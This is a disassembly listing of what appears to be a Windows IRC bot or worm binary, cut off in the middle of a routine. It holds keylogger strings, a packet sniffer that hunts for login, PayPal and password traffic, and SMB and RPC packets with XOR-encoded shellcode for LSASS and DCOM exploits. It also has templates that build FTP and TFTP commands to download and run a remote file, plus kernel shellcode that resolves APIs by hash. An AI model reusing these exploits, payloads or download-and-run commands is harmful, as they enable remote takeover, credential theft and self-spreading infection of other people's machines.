dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_426BA4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4023A7+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_426BDC dd 7A026E02h, 201F6D1Fh, 79656B28h, 2E676F6Ch, 1F6C1F70h
; DATA XREF: sub_4022C6+AE�o
dd 2202967h, 2002BBBBh, 732520h
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4022C6+88�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_4022C6+4E�o
; sub_40EE72+2AE5�o
align 4
asc_426C1C: ; DATA XREF: sub_4022C6+2C�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4023A7+228�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4023A7+1E5�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4023A7+8F�o
align 4
off_426C68 dd offset dword_4274E0 ; DATA XREF: sub_402688+29E�r
dd offset off_4274DC
dd offset aFtp ; "FTP"
dd offset aHttp ; "HTTP"
dword_426C78 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_402688+1DE�o
dword_426C8C dd 0 ; DATA XREF: sub_402688+297�r
dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp db 'HTTP',0 ; DATA XREF: _2:00426C74�o
align 4
aFtp db 'FTP',0 ; DATA XREF: _2:00426C70�o
off_4274DC dd offset aThBySS_ ; DATA XREF: _2:00426C6C�o
; "th by: (%s!%s)."
dword_4274E0 dd 544F42h ; DATA XREF: _2:off_426C68�o
unk_4274E4 db 2 ; DATA XREF: sub_402688+2FC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorRecvFaile db 'Error: recv() failed, returned: <%d>',0
align 4
unk_427528 db 2 ; DATA XREF: sub_402688+2AB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aSuspiciousSPac db 'Suspicious %s packet from: %s:%d - %s.',0
align 4
aPsniff db '[PSNIFF]',0 ; DATA XREF: sub_402688+235�o
align 4
unk_427578 db 2 ; DATA XREF: sub_402688+186�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorWsaioctlF db 'Error: WSAIoctl() failed, returned: <%d>.',0
align 10h
unk_4275C0 db 2 ; DATA XREF: sub_402688+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorBindFaile db 'Error: bind() failed, returned: <%d>.',0
align 4
unk_427604 db 2 ; DATA XREF: sub_402688+85�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aErrorSocketF_1 db 'Error: socket() failed, returned: <%d>.',0
dword_427648 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: sub_402DD7+E1�o
; sub_402DD7+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_427694 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_402B84+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4279F8 dd 20h, 0 ; DATA XREF: sub_402B84+136�o
dd 20h, 5C005Ch, 0
off_427A0C dd offset off_43005C ; DATA XREF: sub_402B84+15D�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
dd 0
dword_427A4C dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_402B84+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402B84+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_427B5C dd 18759Fh ; DATA XREF: sub_402B84+104�o
dword_427B60 dd 100139Dh ; DATA XREF: sub_402B84+FB�o
asc_427B64: ; DATA XREF: sub_4029E9+1C�o
; sub_402ACC+16�o
unicode 0, <\\>,0
align 4
off_427B6C dd offset loc_49005B+1 ; DATA XREF: sub_4029E9+C�o
; sub_402ACC+B�o
dd offset off_430050
dd 24h
unk_427B78 db 2 ; DATA XREF: sub_402DD7+299�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTransferComple db ' transfer complete to IP: %s',0
align 10h
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_402DD7+41�o
align 8
jmp short loc_427BDA
; =============== S U B R O U T I N E =======================================
sub_427BCA proc far ; CODE XREF: sub_427BCA:loc_427BDA�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_427BD2: ; CODE XREF: sub_427BCA+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_427BD2
jmp short loc_427BDF
; ---------------------------------------------------------------------------
loc_427BDA: ; CODE XREF: _2:00427BC8�j
call near ptr sub_427BCA
loc_427BDF: ; CODE XREF: sub_427BCA+E�j
jo short loc_427C43
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_427C61
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_427C43: ; CODE XREF: sub_427BCA:loc_427BDF�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_427C61: ; CODE XREF: sub_427BCA+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_427BCA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_427D08: ; DATA XREF: sub_403249+156�o
; sub_403249+212�o
jmp short loc_427D1A
; =============== S U B R O U T I N E =======================================
sub_427D0A proc near ; CODE XREF: sub_427D0A:loc_427D1A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_427D12: ; CODE XREF: sub_427D0A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_427D12
jmp short loc_427D1F
; ---------------------------------------------------------------------------
loc_427D1A: ; CODE XREF: _2:loc_427D08�j
call sub_427D0A
loc_427D1F: ; CODE XREF: sub_427D0A+E�j
jo short near ptr dword_427C98+1Eh
cwde
cdq
cdq
retn
sub_427D0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_427DB8 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_403249+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_427EA0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: _0:0040370D�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_427F2C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: _0:00403739�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_427FD8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: _0:00403760�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4280B8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_403249+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_42811C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_428188 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42822C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4282AC dd offset loc_401493+2 ; DATA XREF: sub_403249+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_428340 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4283AC dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_428420 dd 0 ; DATA XREF: sub_403249+35F�o
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4284E0 dd 1004600h ; DATA XREF: sub_403249+140�r
; sub_403249+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_428598 dd 0A0D7325h, 0 ; DATA XREF: sub_4030E8+102�o
; sub_405144+DF�o ...
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_4030E8+BE�o
db 'it >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_4030E8+97�o
; ---------------------------------------------------------------------------
loc_428620: ; DATA XREF: sub_403249+177�o
jmp short loc_428628
; ---------------------------------------------------------------------------
jmp short loc_42862A
; ---------------------------------------------------------------------------
align 8
loc_428628: ; CODE XREF: _2:loc_428620�j
; DATA XREF: sub_403249+27�o ...
pop esp
pop esp
loc_42862A: ; CODE XREF: _2:00428622�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_428634 dd 1CEC8166h ; DATA XREF: sub_403249+D�r
dword_428638 dd 0E4FF07h ; DATA XREF: sub_403249+16�r
byte_42863C db 90h ; DATA XREF: sub_403A90+B2�o
db 42h, 90h, 42h
db 90h
dd offset word_429042
align 4
dword_428648 dd 10FF8h, 0 ; DATA XREF: sub_403A90+6A�o
dword_428650 dd 10FF8h ; DATA XREF: sub_403A90+79�o
dword_428654 dd 7FFDF020h, 0 ; DATA XREF: sub_403A90+162�o
dword_42865C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_403EBA+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_4286E4 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_403EBA+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_428714 dd 0 ; DATA XREF: sub_403EBA+44�o
dd 800000D4h, 0
unk_428720 db 81h ; ; DATA XREF: sub_403F94+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_42876C db 41h ; DATA XREF: sub_404032+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_4287B0 proc near ; DATA XREF: _0:0040430F�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_4288AC
push dword ptr [esi]
push 63D61209h
call sub_4288C2
mov [esi+8], eax
call sub_428875
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_4288C2
mov [esi+0Ch], eax
call sub_428827
push dword ptr [esi+4]
push 4C0297FAh
call sub_4288C2
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_4287B0 endp
; =============== S U B R O U T I N E =======================================
sub_428827 proc near ; CODE XREF: sub_4287B0+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_428850
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_428827 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428850 proc near ; CODE XREF: sub_428827+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_42885F: ; CODE XREF: sub_428850+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_42886C
inc ebx
jmp short loc_42885F
; ---------------------------------------------------------------------------
loc_42886C: ; CODE XREF: sub_428850+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_428850 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428875 proc near ; CODE XREF: sub_4287B0+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_42888D: ; CODE XREF: sub_428875+1E�j
cmp [ecx], ebx
jz short loc_428895
mov ecx, [ecx]
jmp short loc_42888D
; ---------------------------------------------------------------------------
loc_428895: ; CODE XREF: sub_428875+1A�j
mov edx, edi
loc_428897: ; CODE XREF: sub_428875+2A�j
cmp [edx+4], ebx
jz short loc_4288A1
mov edx, [edx+4]
jmp short loc_428897
; ---------------------------------------------------------------------------
loc_4288A1: ; CODE XREF: sub_428875+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_428875 endp
; =============== S U B R O U T I N E =======================================
sub_4288AC proc near ; CODE XREF: sub_4287B0+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_4288AC endp
; =============== S U B R O U T I N E =======================================
sub_4288C2 proc near ; CODE XREF: sub_4287B0+16�p
; sub_4287B0+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_4288D8: ; CODE XREF: sub_4288C2+33�j
jecxz short loc_428912
dec ecx
